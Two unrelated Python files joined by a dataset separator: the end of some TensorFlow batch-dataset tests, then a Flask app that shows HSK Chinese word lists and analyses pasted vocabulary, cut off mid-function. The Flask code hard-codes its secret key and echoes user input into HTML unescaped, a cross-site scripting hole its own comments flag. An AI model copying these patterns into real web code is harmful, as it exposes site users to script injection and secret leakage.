        5, num_parallel_calls=num_parallel_calls, name='batch')
    self.assertDatasetProduces(dataset, [list(range(5))])
class BatchCheckpointTest(checkpoint_test_base.CheckpointTestBase,
                          parameterized.TestCase):
  """Checkpoint/restore tests for batched datasets (dense and sparse)."""

  def build_dataset(self, multiplier=15.0, tensor_slice_len=2, batch_size=2):
    # Three parallel components (int vector, 2-D int, float vector).
    components = (np.arange(tensor_slice_len), np.array([[1, 2, 3]]) *
                  np.arange(tensor_slice_len)[:, np.newaxis],
                  np.array(multiplier) * np.arange(tensor_slice_len))
    return dataset_ops.Dataset.from_tensor_slices(components).batch(batch_size)

  @combinations.generate(
      combinations.times(test_base.default_test_combinations(),
                         checkpoint_test_base.default_test_combinations()))
  def test(self, verify_fn):
    tensor_slice_len = 8
    batch_size = 2
    num_outputs = tensor_slice_len // batch_size
    verify_fn(self,
              lambda: self.build_dataset(15.0, tensor_slice_len, batch_size),
              num_outputs)

  def _sparse(self, i):
    return sparse_tensor.SparseTensorValue(
        indices=[[0]], values=(i * [1]), dense_shape=[1])

  def _build_dataset_sparse(self, batch_size=5):
    return dataset_ops.Dataset.range(10).map(self._sparse).batch(batch_size)

  @combinations.generate(
      combinations.times(test_base.default_test_combinations(),
                         checkpoint_test_base.default_test_combinations()))
  def testSparse(self, verify_fn):
    verify_fn(self, self._build_dataset_sparse, num_outputs=2)

  def _build_dataset_nested_sparse(self):
    return dataset_ops.Dataset.range(10).map(self._sparse).batch(5).batch(2)

  @combinations.generate(
      combinations.times(test_base.default_test_combinations(),
                         checkpoint_test_base.default_test_combinations()))
  def testNestedSparse(self, verify_fn):
    verify_fn(self, self._build_dataset_nested_sparse, num_outputs=1)
class BatchRandomAccessTest(test_base.DatasetTestBase, parameterized.TestCase):
  """Tests `tf.data.experimental.random_access.at()` on batched datasets."""

  @combinations.generate(
      combinations.times(test_base.default_test_combinations(),
                         combinations.combine(index=[-1, 2, 3, 4])))
  def testInvalidIndex(self, index):
    dataset = dataset_ops.Dataset.from_tensor_slices([1, 2, 3, 4]).batch(2)
    with self.assertRaises(errors.OutOfRangeError):
      self.evaluate(random_access.at(dataset, index=index))

  @combinations.generate(test_base.default_test_combinations())
  def testEmptyDataset(self):
    dataset = dataset_ops.Dataset.from_tensor_slices([]).batch(2)
    with self.assertRaises(errors.OutOfRangeError):
      self.evaluate(random_access.at(dataset, 0))

  @combinations.generate(
      combinations.times(
          test_base.default_test_combinations(),
          combinations.combine(
              count=[0, 10, 20, 30, 40, 50],
              batch_size=[1, 3, 5, 7, 10, 20],
              drop_remainder=[True, False])))
  def testBasic(self, count, batch_size, drop_remainder):
    """Tests the batch dataset logic for various input configurations.

    Args:
      count: the number of input elements
      batch_size: the batch size
      drop_remainder: whether a smaller batch size should be produced if batch
        size does not divide number of inputs evenly
    """
    dataset = dataset_ops.Dataset.from_tensor_slices(list(range(count))).batch(
        batch_size=batch_size, drop_remainder=drop_remainder)
    num_full_batches = count // batch_size
    for i in range(num_full_batches):
      expected_batch = np.arange(
          i * batch_size, (i * batch_size + batch_size), 1, dtype=np.int32)
      self.assertAllEqual(expected_batch,
                          self.evaluate(random_access.at(dataset, i)))
    has_remainder = (not drop_remainder) and (count % batch_size != 0)
    if has_remainder:
      expected_batch = np.arange(batch_size * num_full_batches, count, 1)
      self.assertAllEqual(
          expected_batch,
          self.evaluate(random_access.at(dataset, num_full_batches)))
    # One past the final batch must be out of range.
    with self.assertRaises(errors.OutOfRangeError):
      self.evaluate(
          random_access.at(
              dataset, index=num_full_batches + (1 if has_remainder else 0)))

  @combinations.generate(test_base.default_test_combinations())
  def testRandomAccessBatchWithShuffle(self):
    dataset = dataset_ops.Dataset.from_tensor_slices([1, 2, 3, 4, 5, 6, 7])
    shuffle_dataset = dataset.shuffle(buffer_size=10, seed=2)
    batch_dataset = shuffle_dataset.batch(2)
    # Fixed seed makes the shuffled order deterministic.
    expected_output = [
        np.array([5, 2], dtype=np.int32),
        np.array([4, 7], dtype=np.int32),
        np.array([1, 3], dtype=np.int32),
        np.array([6], dtype=np.int32)
    ]
    for i in range(4):
      self.assertAllEqual(expected_output[i],
                          self.evaluate(random_access.at(batch_dataset, i)))
    # Checks the order is consistent with shuffle dataset.
    for i in range(3):
      self.assertAllEqual(
          expected_output[i][0],
          self.evaluate(random_access.at(shuffle_dataset, i * 2)))
      self.assertAllEqual(
          expected_output[i][1],
          self.evaluate(random_access.at(shuffle_dataset, (i * 2) + 1)))
    # Checks the remainder is the last element in shuffled dataset.
    self.assertAllEqual(expected_output[3][0],
                        self.evaluate(random_access.at(shuffle_dataset, 6)))
# Standard TensorFlow test entry point.
if __name__ == '__main__':
  test.main()
| StarcoderdataPython |
3306891 | from flask import Flask, request
# from flask import Flask, request, url_for
import codecs, unicodedata, urllib
# import math, time, re, os, os.path, random
app = Flask(__name__)
# NOTE(review): hard-coded secret key checked into source -- in any real
# deployment this should be loaded from configuration or the environment.
app.secret_key = 's9z9g8bs8b0jis secret key <KEY>'
# try to get the value both from the args and the form
# try to get the value both from the args and the form
def getform(key, default=u""):
    """Fetch *key* from the query string, falling back to POSTed form data."""
    value = request.args.get(key, default)
    if value != u"":
        return value
    return request.form.get(key, value)
@app.route('/', methods=['GET', 'POST'])
def handle_root():
    """Front page: links to the analysis tools and the HSK word/character lists."""
    init_resources()
    parts = [
        "<html>\n<head>",
        u"<title>HSK\u4E1C\u897F Scripts</title>",
        "</head>\n<body>",
        u"""<a href="http://hskhsk.com/">HSK\u4E1C\u897F</a>""",
        u"<h1>HSK\u4E1C\u897F Scripts</h1>",
        "Tools",
        "<ul>",
        u"""<li><a href="/hanzi">Analyse Your \u6C49\u5B57 Vocabulary/Text</a></li>""",
        u"""<li><a href="/hskwords20102012">Where the HSK 2010 words are in 2013</a></li>""",
        u"""<li><a href="/hskchars20102012">Where the HSK 2010 characters are in 2013</a></li>""",
        "</ul>",
        "New HSK Lists",
        "<ul>",
        """<li><a href="/hskwords">HSK Words 2012/2013</a></li>""",
        """<li><a href="/hskchars">HSK Characters 2012/2013</a></li>""",
        """<li><a href="/hskwords2010">HSK Words 2010 (outdated)</a></li>""",
        """<li><a href="/hskchars2010">HSK Characters 2010 (outdated)</a></li>""",
        "</ul>",
        "</body>\n</html>",
    ]
    return u"\n".join(parts)
@app.route('/hsk', methods=['GET', 'POST'])
def handle_hsk():
    # Legacy alias: /hsk serves the same index page as /.
    return handle_root()
@app.route('/hskwords', methods=['GET', 'POST'])
def handle_hskwords():
    # /hskwords always shows the newest (2012/2013) word lists.
    return handle_hskwords2012()
@app.route('/hskchars', methods=['GET', 'POST'])
def handle_hskchars():
    # /hskchars always shows the newest (2012/2013) character lists.
    return handle_hskchars2012()
@app.route('/hskwords2012', methods=['GET', 'POST'])
def handle_hskwords2012():
    """Render the New HSK 2012/2013 word lists, one section per level (1-6)."""
    init_resources()
    results = []
    results.append("<html>\n<head>")
    results.append(u"<title>New HSK 2013 Words</title>")
    results.append(u"<style>.definition {color: #000; text-decoration: none; }</style>")
    results.append("</head>\n<body>")
    results.append(u"""<a href="http://hskhsk.com/word-lists">HSK\u4E1C\u897F</a>""")
    results.append(u"""<a href="/">Scripts</a>""")
    results.append("""<a href="/hskchars">HSK Characters</a>""")
    results.append(u"<h1>New HSK 2013 Words</h1>")
    for i in range(1, 7):
        results.append(u"<h3>HSK {}</h3>".format(i))
        # Words are rendered as frequency-ordered links by freqorder_word_link.
        results.append(", ".join(freqorder_word_link(hskwords[i])))
    results.append("</body>\n</html>")
    return u"\n".join(results)
@app.route('/hskchars2012', methods=['GET', 'POST'])
def handle_hskchars2012():
    """Render the New HSK 2012/2013 character lists, one section per level (1-6)."""
    init_resources()
    results = []
    results.append("<html>\n<head>")
    results.append(u"<title>New HSK 2013 Characters</title>")
    results.append(u"<style>.definition {color: #000; text-decoration: none; }</style>")
    results.append("</head>\n<body>")
    results.append(u"""<a href="http://hskhsk.com/word-lists">HSK\u4E1C\u897F</a>""")
    results.append(u"""<a href="/">Scripts</a>""")
    results.append("""<a href="/hskwords">HSK Words</a>""")
    results.append(u"<h1>HSK 2013 Characters</h1>")
    for i in range(1, 7):
        results.append(u"<h3>HSK {}</h3>".format(i))
        results.append(u", ".join(freqorder_char_link(hskchars[i])))
    results.append("</body>\n</html>")
    return u"\n".join(results)
@app.route('/hskwords2010', methods=['GET', 'POST'])
def handle_hskwords2010():
    """Render the superseded New HSK 2010 word lists, one section per level."""
    init_resources()
    results = []
    results.append("<html>\n<head>")
    results.append(u"<title>New HSK 2010 Words (outdated)</title>")
    results.append(u"<style>.definition {color: #000; text-decoration: none; }</style>")
    results.append("</head>\n<body>")
    results.append(u"""<a href="http://hskhsk.com/word-lists">HSK\u4E1C\u897F</a>""")
    results.append(u"""<a href="/">Scripts</a>""")
    results.append("""<a href="/hskchars2010">HSK Characters 2010 (outdated)</a>""")
    results.append("""<a href="/hskchars">HSK Characters 2012/2013</a>""")
    results.append(u"<h1>New HSK 2010 Words (outdated)</h1>")
    for i in range(1, 7):
        results.append(u"<h3>HSK {}</h3>".format(i))
        results.append(", ".join(freqorder_word_link(hskwords2010[i])))
    results.append("</body>\n</html>")
    return u"\n".join(results)
@app.route('/hskchars2010', methods=['GET', 'POST'])
def handle_hskchars2010():
    """Render the superseded New HSK 2010 character lists, one section per level."""
    init_resources()
    results = []
    results.append("<html>\n<head>")
    # Fixed user-facing typo in the page title: "oudated" -> "outdated".
    results.append(u"<title>New HSK 2010 Characters (outdated)</title>")
    results.append(u"<style>.definition {color: #000; text-decoration: none; }</style>")
    results.append("</head>\n<body>")
    results.append(u"""<a href="http://hskhsk.com/word-lists">HSK\u4E1C\u897F</a>""")
    results.append(u"""<a href="/">Scripts</a>""")
    results.append("""<a href="/hskwords2010">HSK Words 2010 (outdated)</a>""")
    results.append("""<a href="/hskwords">HSK Words 2012/2013</a>""")
    results.append(u"<h1>New HSK 2010 Characters (outdated)</h1>")
    for i in range(1, 7):
        results.append(u"<h3>HSK {}</h3>".format(i))
        results.append(u", ".join(freqorder_char_link(hskchars2010[i])))
    results.append("</body>\n</html>")
    return u"\n".join(results)
@app.route('/hskwords20102012', methods=['GET', 'POST'])
def handle_hskwords20102012():
    """Render a cross-table showing where each HSK 2010 word moved in 2012/2013."""
    init_resources()
    results = []
    results.append("<html>\n<head>")
    results.append(u"<title>Where the HSK 2010 Words are in 2012/2013</title>")
    results.append(u"<style>.definition {color: #000; text-decoration: none; }</style>")
    results.append("</head>\n<body>")
    results.append(u"""<a href="http://hskhsk.com/word-lists">HSK\u4E1C\u897F</a>""")
    results.append(u"""<a href="/">Scripts</a>""")
    results.append("""<a href="/hskchars20102012">Where the HSK 2010 Characters are in 2013</a>""")
    results.append(u"<h1>Where the HSK 2010 Words are in 2013</h1>")
    results.append("""<p>This page shows where the words in the New HSK 2010 ended up when the word lists were revised in 2012 (also valid for 2013).</p>
<table border="1" style="border-collapse:collapse;" cellpadding="2em" cellspacing="0">
<tr><th rowspan=2 colspan=2 style="background-color: #BBBBBB;"></th><th colspan=7>HSK 2012-2013</th></tr>
<tr>
<th><div style="white-space: nowrap;"> HSK 1 </div></th>
<th><div style="white-space: nowrap;"> HSK 2 </div></th>
<th><div style="white-space: nowrap;"> HSK 3 </div></th>
<th><div style="white-space: nowrap;"> HSK 4 </div></th>
<th><div style="white-space: nowrap;"> HSK 5 </div></th>
<th><div style="white-space: nowrap;"> HSK 6 </div></th>
<th><div style="white-space: nowrap;"> Non-HSK </div></th>
</tr>""")
    # Rows: 2010 levels 1-6 plus 7 = "Non-HSK"; columns likewise for 2012/2013.
    for old in range(1, 8):
        results.append("<tr>")
        if old == 1:
            results.append("""<th rowspan=7>HSK 2010</th>""")
        if old == 7:
            results.append("""<th><div style="white-space: nowrap;">Non-HSK</div></th>""")
        else:
            results.append("""<th><div style="white-space: nowrap;">HSK {}</div></th>""".format(old))
        for new in range(1, 8):
            if old == new:
                # Diagonal (no level change) is greyed out rather than listed.
                results.append("""<td style="background-color: #BBBBBB;"></td>""")
            else:
                # NOTE(review): index 16 appears to hold the union of all HSK
                # levels -- confirm against init_resources().
                if old == 7:
                    somehanzi = hskwords[new] - hskwords2010[16]
                elif new == 7:
                    somehanzi = hskwords2010[old] - hskwords[16]
                else:
                    somehanzi = hskwords2010[old] & hskwords[new]
                results.append("<td>")
                results.append(u", ".join(freqorder_word_link(somehanzi)))
                results.append("</td>")
        results.append("</tr>")
    results.append("</table>\n</body>\n</html>")
    return u"\n".join(results)
@app.route('/hskchars20102012', methods=['GET', 'POST'])
def handle_hskchars20102012():
    """Render a cross-table showing where each HSK 2010 character moved in 2013."""
    init_resources()
    results = []
    results.append("<html>\n<head>")
    results.append(u"<title>Where the HSK 2010 Characters are in 2013</title>")
    results.append(u"<style>.definition {color: #000; text-decoration: none; }</style>")
    results.append("</head>\n<body>")
    results.append(u"""<a href="http://hskhsk.com/word-lists">HSK\u4E1C\u897F</a>""")
    results.append(u"""<a href="/">Scripts</a>""")
    results.append("""<a href="/hskwords20102012">Where the HSK 2010 Words are in 2013</a>""")
    results.append(u"<h1>Where the HSK 2010 Characters are in 2013</h1>")
    results.append("""<p>This page shows where the characters in the New HSK 2010 ended up when the word lists were revised in 2012 (also valid for 2013).</p>
<table border="1" style="border-collapse:collapse;" cellpadding="2em" cellspacing="0">
<tr><th rowspan=2 colspan=2 style="background-color: #BBBBBB;"></th><th colspan=7>HSK 2012-2013</th></tr>
<tr>
<th><div style="white-space: nowrap;"> HSK 1 </div></th>
<th><div style="white-space: nowrap;"> HSK 2 </div></th>
<th><div style="white-space: nowrap;"> HSK 3 </div></th>
<th><div style="white-space: nowrap;"> HSK 4 </div></th>
<th><div style="white-space: nowrap;"> HSK 5 </div></th>
<th><div style="white-space: nowrap;"> HSK 6 </div></th>
<th><div style="white-space: nowrap;"> Non-HSK </div></th>
</tr>""")
    # Rows: 2010 levels 1-6 plus 7 = "Non-HSK"; columns likewise for 2012/2013.
    for old in range(1, 8):
        results.append("<tr>")
        if old == 1:
            results.append("""<th rowspan=7>HSK 2010</th>""")
        if old == 7:
            results.append("""<th><div style="white-space: nowrap;">Non-HSK</div></th>""")
        else:
            results.append("""<th><div style="white-space: nowrap;">HSK {}</div></th>""".format(old))
        for new in range(1, 8):
            if old == new:
                # Diagonal (no level change) is greyed out rather than listed.
                results.append("""<td style="background-color: #BBBBBB;"></td>""")
            else:
                # NOTE(review): index 16 appears to hold the union of all HSK
                # levels -- confirm against init_resources().
                if old == 7:
                    somehanzi = hskchars[new] - hskchars2010[16]
                elif new == 7:
                    somehanzi = hskchars2010[old] - hskchars[16]
                else:
                    somehanzi = hskchars2010[old] & hskchars[new]
                results.append("<td>")
                results.append(u", ".join(freqorder_char_link(somehanzi)))
                results.append("</td>")
        results.append("</tr>")
    results.append("</table>\n</body>\n</html>")
    return u"\n".join(results)
@app.route('/hanzi', methods=['GET', 'POST'])
def handle_hanzi():
    """Render the hanzi vocabulary analysis form and, if hanzi were
    submitted, run the selected analyses via performactions().

    On the first visit a few checkboxes default to on; after any submission
    the hidden 'ignoredefaults' field makes the form reflect only the
    user's explicit choices.
    """
    defaultistrue = "true"
    if getform("ignoredefaults", ""):
        defaultistrue = ""
    # State of every form control, echoed back so the form is sticky.
    wordfreqchecked = "checked" if getform("analysevocab", defaultistrue) else ""
    hskanalwordschecked = "checked" if getform("analysehskwords", defaultistrue) else ""
    hskanalcharschecked = "checked" if getform("analysehskchars") else ""
    hskwordschecked = "checked" if getform("suggesthskwords") else ""
    hskcharschecked = "checked" if getform("suggesthskchars") else ""
    freqwordschecked = "checked" if getform("suggestwords") else ""
    freqwordsrechecked = "checked" if getform("suggestwordsreuse") else ""
    freqcharschecked = "checked" if getform("suggestchars") else ""
    addfreqindexchecked = "checked" if getform("addfreqindex", defaultistrue) else ""
    addfreqvaluechecked = "checked" if getform("addfreqvalue") else ""
    oneperlinechecked = ""
    blockchecked = "checked" if getform("format") == "block" else ""
    if blockchecked == "":
        oneperlinechecked = "checked"
    defaulthanzi = u""
    hanzi = getform("hanzi", defaulthanzi)
    results = []
    results.append("<html>\n<head>")
    results.append(u"<title>Analyse Your \u6C49\u5B57 Vocabulary/Text</title>")
    results.append("""<style>
.box {
display: inline-block;
}
.title {
text-align:center;
font-weight: bolder;
}
.indent {
clear: both;
padding-left: 1.8em;
text-indent: -1.3em;
}
table tr td {
padding-right: 1em;
}
.compact {
margin-bottom: 0.4em;
margin-top: 0.2em;
}
</style>""")
    results.append("</head>")
    results.append("<body>")
    results.append(u"""<a href="http://hskhsk.com/analyse.html">HSK\u4E1C\u897F</a>""")
    results.append(u"""<a href="/">Scripts</a>""")
    # Main form template; the {} slots are filled positionally below.
    # Fixed here: "Suggest words not input" -> "not in input", a stray
    # </ul> left over from an old list layout, and "simpflified".
    # NOTE(review): the submitted hanzi is echoed into the textarea without
    # HTML escaping (potential XSS) -- flagged, not changed, to preserve
    # existing behaviour for legitimate input.
    results.append(u"""<h1 class="compact">Analyse Your \u6C49\u5B57 Vocabulary/Text</h1>
<form method="POST" action="/hanzi">
<input type='hidden' value='true' name='ignoredefaults'>
<table>
<tr><td valign="top">
<h3 class="compact">Actions</h3>
<div class="indent"><input type="checkbox" name="analysevocab" value="true" {}>Analyse words/characters in input</input></div>
<div class="indent"><input type="checkbox" name="analysehskwords" value="true" {}>Analyse HSK words in input</input></div>
<div class="indent"><input type="checkbox" name="analysehskchars" value="true" {}>Analyse HSK characters in input</input></div>
<div class="indent"><input type="checkbox" name="suggesthskwords" value="true" {}>Suggest HSK words not in input</input></div>
<div class="indent"><input type="checkbox" name="suggesthskchars" value="true" {}>Suggest HSK characters not in input</input></div>
<div class="indent"><input type="checkbox" name="suggestwords" value="true" {}>Suggest words not in input</input></div>
<div class="indent"><input type="checkbox" name="suggestwordsreuse" value="true" {}>Suggest words using characters in input</input></div>
<div class="indent"><input type="checkbox" name="suggestchars" value="true" {}>Suggest characters not in input</input></div>
</td>
<td valign="top">
<h3 class="compact">Vocabulary/Text Input Options</h3>
<div class="indent"><input type="radio" name="format" value="oneperline" {}>One word/character per line (anything after first whitespace ignored, use this for Skritter word lists)</input></div>
<div class="indent"><input type="radio" name="format" value="block" {}>Big block of text (use this if pasting from a web page etc.)</input></div>
<h3 class="compact">Hanzi List Output Options</h3>
<div class="indent"><input type="checkbox" name="addfreqindex" value="true" {}>Add SUBTLEX-CH frequency index (1 for highest frequency word/character, higher values are less frequent)</input></div>
<div class="indent"><input type="checkbox" name="addfreqvalue" value="true" {}>Add SUBTLEX-CH raw word/character frequency (higher values are more frequent)</div>
</td></tr>
</table>
<h3 class="compact">Input your simplified Chinese vocabulary or text here</h3>
<textarea name="hanzi" cols="80" rows="15">{}</textarea><br />
<input type="submit" value=" Go! " /></form>
""".format(wordfreqchecked, hskanalwordschecked, hskanalcharschecked, hskwordschecked, hskcharschecked, freqwordschecked, freqwordsrechecked, freqcharschecked,
           oneperlinechecked, blockchecked,
           addfreqindexchecked, addfreqvaluechecked,
           hanzi))
    if hanzi != defaulthanzi:
        performactions(hanzi, results)
    results.append("</body>\n</html>")
    return u"\n".join(results)
def performactions(hanzi, results):
    """Parse the submitted hanzi and run every analysis the user ticked.

    Appends HTML fragments (warnings first, then one section per selected
    action) to `results` in place.
    """
    init_resources()
    notes = []
    # Two input modes: free-running text vs. one word per line.
    if getform("format") == "block":
        words, chars, hskwordcount, hskcharcount = parseblock(hanzi, notes)
    else:
        words, chars, hskwordcount, hskcharcount = parselist(hanzi, notes)
    if len(notes):
        results.append("""<span style="color:red;"><h1>Warnings</h1><ul>""")
        for note in notes:
            results.append(u"<li>{}</li>".format(note))
        results.append("</ul></span>")
    results.append("<h1>Results</h1>Note that all word/character lists are in descending order of frequency.")
    # One section per ticked checkbox, in fixed page order.
    if getform("analysevocab"):
        analysewords(results, words, chars, hskwordcount, hskcharcount)
    if getform("analysehskwords"):
        analysehskwords(results, words, hskwordcount)
    if getform("analysehskchars"):
        analysehskchars(results, chars, hskcharcount)
    if getform("suggesthskwords"):
        suggesthskwords(results, words, chars)
    if getform("suggesthskchars"):
        suggesthskchars(results, words, chars)
    if getform("suggestwords"):
        suggestfreqwords(results, words, chars)
    if getform("suggestwordsreuse"):
        suggestfreqwordsre(results, words, chars)
    if getform("suggestchars"):
        suggestfreqchars(results, words, chars)
def blockboxtemplate():
    """Return the format template for one titled textarea "box".

    The box is widened when both the frequency-index and raw-frequency
    columns are selected, since each line then carries two extra fields.
    """
    if getform("addfreqindex") and getform("addfreqvalue"):
        cols="cols=\"25\""
    else:
        cols="cols=\"15\""
    return u"""<div class="box"><div class="title">{}</div><div><textarea name="{}" """ + cols + """ rows="12">{}</textarea></div></div>"""

# Wide template used for the full-width suggestion lists.
textareatemplate = u"""<textarea name="{}" cols="40" rows="12">{}</textarea>"""
def analysewords(results, words, chars, hskwordcount, hskcharcount):
    """Append summary counts for the input plus textareas listing the
    unique words and unique characters in frequency order.

    hskwordcount/hskcharcount map HSK level (0 = non-HSK) to the total
    number of words/characters seen at that level, repeats included, so
    summing their values gives the total (non-unique) counts.
    """
    results.append("<h3>Analysis of Words/Characters in Input</h3>")
    singlecharcount = len([w for w in words if len(w) == 1])
    wordcount = len(words)
    charcount = len(chars)
    totalwords = sum(hskwordcount.values())
    totalchars = sum(hskcharcount.values())
    results.append(u"""Input contained:<ul>
<li>{} unique single-character words</li>
<li>{} unique multi-character words</li>
<li>{} unique words</li>
<li>{} unique characters</li>
<li>{} total words</li>
<li>{} total characters</li>
</ul>""".format(singlecharcount, wordcount-singlecharcount, wordcount, charcount, totalwords, totalchars))
    wordsknown = u"\n".join(freqorder_word(words))
    charsknown = u"\n".join(freqorder_char(chars))
    results.append(blockboxtemplate().format("Unique Words", "wordsknown", wordsknown))
    results.append(blockboxtemplate().format("Unique Characters", "charsknown", charsknown))
def analysehskwords(results, words, hskwordcount):
    """Append statistics on how the input's words cover each HSK level.

    Three breakdowns are produced: coverage of each HSK level's word list,
    composition of the unique input words by level, and composition of the
    total (repeats included) input words by level; followed by per-level
    textareas of the matching words.

    Args:
        results: list of HTML fragments, appended to in place.
        words: set of unique words found in the input.
        hskwordcount: dict mapping HSK level (0 = non-HSK) to the total
            number of input words at that level, repeats included.
    """
    knownintersect = {}
    results.append("<h3>Analysis of HSK Words in Input</h3>")
    results.append("Input contained:<ul>")
    cumulativeknown = {}
    cumulativetotal = {}
    cumulativeknown[0] = 0
    cumulativetotal[0] = 0
    numknown = {}
    numhsk = {}
    for i in range(1, 7):
        knownintersect[i] = words & hskwords[i]
        numknown[i] = len(knownintersect[i])
        numhsk[i] = len(hskwords[i])
        percentknown = 100 * float(numknown[i]) / numhsk[i]
        cumulativeknown[i] = cumulativeknown[i-1] + numknown[i]
        cumulativetotal[i] = cumulativetotal[i-1] + numhsk[i]
        results.append(u"""<li>{} ({:.2f}%) of the {} HSK {} words""".format(numknown[i], percentknown, numhsk[i], i))
        # FIX: was "if i > 1 > 0", a confusing chained comparison whose
        # second leg (1 > 0) is always true; "i > 1" is what was meant and
        # matches the cumulative checks further below.
        if i > 1:
            cumpercentknown = 100 * float(cumulativeknown[i]) / cumulativetotal[i]
            results.append(u""" <i>(Cumulative: {} ({:.2f}%) of the {} HSK 1-{} words)</i>""".format(cumulativeknown[i], cumpercentknown, cumulativetotal[i], i))
        results.append("</li>")
    results.append("</ul>")
    totalunique = len(words)
    if totalunique > 0:
        numknown_nonhsk = totalunique - cumulativeknown[6]
        results.append("Of the {} <b>unique</b> words in the input:<ul>".format(totalunique))
        for i in range(1, 7):
            percentknown = 100 * float(numknown[i]) / totalunique
            results.append(u"""<li>{} ({:.2f}%) were HSK {} words""".format(numknown[i], percentknown, i))
            if i > 1:
                cumpercentknown = 100 * float(cumulativeknown[i]) / totalunique
                results.append(u"""<i>(Cumulative: {} ({:.2f}%) were HSK 1-{} words)</i>""".format(cumulativeknown[i], cumpercentknown, i))
            results.append("</li>")
        numknown_nonhsk_percent = 100 * float(numknown_nonhsk) / totalunique
        results.append(u"""<li>{} ({:.2f}%) were non-HSK words</li>""".format(numknown_nonhsk, numknown_nonhsk_percent))
        results.append("</ul>")
    totalwords = sum(hskwordcount.values())
    if totalwords == totalunique:
        results.append("<p><i>Each word appeared only once in the input.</i></p>")
    else:
        cumknown = 0
        results.append("Of the {} <b>total</b> words that were input:<ul>".format(totalwords))
        for i in range(1, 7):
            percentknown = 100 * float(hskwordcount[i]) / totalwords
            cumknown += hskwordcount[i]
            results.append(u"""<li>{} ({:.2f}%) were HSK {} words""".format(hskwordcount[i], percentknown, i))
            if i > 1:
                cumpercentknown = 100 * float(cumknown) / totalwords
                results.append(u"""<i>(Cumulative: {} ({:.2f}%) were HSK 1-{} words)</i>""".format(cumknown, cumpercentknown, i))
            results.append("</li>")
        num_nonhsk = totalwords - cumknown
        numknown_nonhsk_percent = 100 * float(num_nonhsk) / totalwords
        results.append(u"""<li>{} ({:.2f}%) were non-HSK words</li>""".format(num_nonhsk, numknown_nonhsk_percent))
        results.append("</ul>")
    # Per-level textareas of the matching input words, then the remainder.
    for i in range(1, 7):
        wordsknown = u"\n".join(freqorder_word(knownintersect[i]))
        results.append(blockboxtemplate().format("HSK " + str(i), "hskwordsknown" + str(i), wordsknown))
    nonhskwords = u"\n".join(freqorder_word(words - hskwords[16]))
    results.append(blockboxtemplate().format("Non-HSK", "nonhskwordsknown", nonhskwords))
def analysehskchars(results, chars, hskcharcount):
    """Append statistics on how the input's characters cover each HSK level.

    Mirrors analysehskwords(): per-level coverage, unique-character
    composition, total-character composition, then per-level textareas.

    Args:
        results: list of HTML fragments, appended to in place.
        chars: set of unique characters found in the input.
        hskcharcount: dict mapping HSK level (0 = non-HSK) to the total
            number of input characters at that level, repeats included.
    """
    knownintersect = {}
    results.append("<h3>Analysis of HSK Characters in Input</h3>")
    results.append("Input contained:<ul>")
    cumulativeknown = {}
    cumulativetotal = {}
    cumulativeknown[0] = 0
    cumulativetotal[0] = 0
    numknown = {}
    numhsk = {}
    for i in range(1, 7):
        knownintersect[i] = chars & hskchars[i]
        numknown[i] = len(knownintersect[i])
        numhsk[i] = len(hskchars[i])
        percentknown = 100 * float(numknown[i]) / numhsk[i]
        cumulativeknown[i] = cumulativeknown[i-1] + numknown[i]
        cumulativetotal[i] = cumulativetotal[i-1] + numhsk[i]
        results.append(u"""<li>{} ({:.2f}%) of the {} HSK {} characters""".format(numknown[i], percentknown, numhsk[i], i))
        # FIX: was "if i > 1 > 0" -- the "1 > 0" leg is always true, so the
        # plain "i > 1" used by the other cumulative checks is intended.
        if i > 1:
            cumpercentknown = 100 * float(cumulativeknown[i]) / cumulativetotal[i]
            results.append(u""" <i>(Cumulative: {} ({:.2f}%) of the {} HSK 1-{} characters)</i>""".format(cumulativeknown[i], cumpercentknown, cumulativetotal[i], i))
        results.append("</li>")
    results.append("</ul>")
    totalunique = len(chars)
    if totalunique > 0:
        numknown_nonhsk = totalunique - cumulativeknown[6]
        results.append("Of the {} <b>unique</b> characters in the input:<ul>".format(totalunique))
        for i in range(1, 7):
            percentknown = 100 * float(numknown[i]) / totalunique
            results.append(u"""<li>{} ({:.2f}%) were HSK {} characters""".format(numknown[i], percentknown, i))
            if i > 1:
                cumpercentknown = 100 * float(cumulativeknown[i]) / totalunique
                results.append(u"""<i>(Cumulative: {} ({:.2f}%) were HSK 1-{} characters)</i>""".format(cumulativeknown[i], cumpercentknown, i))
            results.append("</li>")
        numknown_nonhsk_percent = 100 * float(numknown_nonhsk) / totalunique
        results.append(u"""<li>{} ({:.2f}%) were non-HSK characters</li>""".format(numknown_nonhsk, numknown_nonhsk_percent))
        results.append("</ul>")
    totalchars = sum(hskcharcount.values())
    if totalchars == totalunique:
        results.append("<p><i>Each character appeared only once in the input.</i></p>")
    else:
        cumknown = 0
        results.append("Of the {} <b>total</b> characters that were input:<ul>".format(totalchars))
        for i in range(1, 7):
            percentknown = 100 * float(hskcharcount[i]) / totalchars
            cumknown += hskcharcount[i]
            results.append(u"""<li>{} ({:.2f}%) were HSK {} characters""".format(hskcharcount[i], percentknown, i))
            if i > 1:
                cumpercentknown = 100 * float(cumknown) / totalchars
                results.append(u"""<i>(Cumulative: {} ({:.2f}%) were HSK 1-{} characters)</i>""".format(cumknown, cumpercentknown, i))
            results.append("</li>")
        num_nonhsk = totalchars - cumknown
        numknown_nonhsk_percent = 100 * float(num_nonhsk) / totalchars
        results.append(u"""<li>{} ({:.2f}%) were non-HSK characters</li>""".format(num_nonhsk, numknown_nonhsk_percent))
        results.append("</ul>")
    # Per-level textareas of the matching characters, then the remainder.
    for i in range(1, 7):
        charsknown = u"\n".join(freqorder_char(knownintersect[i]))
        results.append(blockboxtemplate().format("HSK " + str(i), "hskcharsknown" + str(i), charsknown))
    nonhskchars = u"\n".join(freqorder_char(chars - hskchars[16]))
    results.append(blockboxtemplate().format("Non-HSK", "nonhskcharsknown", nonhskchars))
def suggesthskwords(results, words, chars):
    """Append textareas of HSK words (per level) absent from the input,
    plus up to 1000 of the most frequent non-HSK words not in the input.

    `chars` is accepted for signature consistency with the other suggest_*
    actions but is not used here.
    """
    results.append("""<h3>Suggested HSK Words not in Input</h3>""")
    for i in range(1, 7):
        wordstolearn = u"\n".join(freqorder_word(hskwords[i] - words))
        results.append(blockboxtemplate().format("HSK " + str(i), "hskwordstolearn" + str(i), wordstolearn))
    # Highest-frequency words neither in the input nor in any HSK list.
    foundwords = []
    for freq, word in word_freq_ordered:
        if word not in words and word not in hskwords[16]:
            foundwords.append(word)
            if len(foundwords) >= 1000:
                break
    wordstext = u"\n".join(freqorder_word(foundwords))
    # FIX: the textarea name previously appended the leaked loop variable
    # (always producing "...6"); use an explicit, stable field name.
